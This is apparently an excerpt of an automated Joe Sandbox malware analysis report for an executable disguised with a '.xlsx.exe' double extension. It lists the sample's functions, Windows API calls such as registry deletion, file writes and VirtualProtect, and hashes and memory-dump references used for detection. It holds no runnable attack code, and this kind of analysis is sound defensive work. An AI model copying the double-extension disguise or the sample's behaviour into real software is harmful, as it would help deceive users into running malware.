Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D

Function 004022D5 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
RegCloseKey.ADVAPI32(00000000), ref: 004022FD

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
Opcode Fuzzy Hash: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D

Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
EnableWindow.USER32(00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E

Function 00405BB4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16

Function 004026F9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713

Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E

Function 00402253 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669

Function 00405C37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4

Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E5

Memory Dump Source

Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19

Function 00402295 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A

Function 004041E6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D

Function 0040330F Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D

Function 004041CF Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19

Function 004041BC Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E6

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
Opcode Fuzzy Hash: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39

Non-executed Functions

Function 00404B6E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B86
GetDlgItem.USER32(?,?), ref: 00404B91
GlobalAlloc.KERNEL32(?,?), ref: 00404BDB
LoadBitmapW.USER32(0000006E), ref: 00404BEE
SetWindowLongW.USER32(?,?,00405166), ref: 00404C07
ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404C1B
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C61
DeleteObject.GDI32(00000000), ref: 00404C64
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
GetWindowLongW.USER32(?,?), ref: 00404D9F
SetWindowLongW.USER32(?,?,00000000), ref: 00404DAD
ShowWindow.USER32(?,00000005), ref: 00404DBE
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F35
SendMessageW.USER32(?,?,00000000,?), ref: 00404F59
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
ImageList_Destroy.COMCTL32(?), ref: 00404F8E
GlobalFree.KERNEL32(?), ref: 00404F9E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
ShowWindow.USER32(?,00000000), ref: 0040513D
GetDlgItem.USER32(?,000003FE), ref: 00405148
ShowWindow.USER32(00000000), ref: 0040514F

Strings

M, xrefs: 00404D18
, xrefs: 00405127
N, xrefs: 00404DF9

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
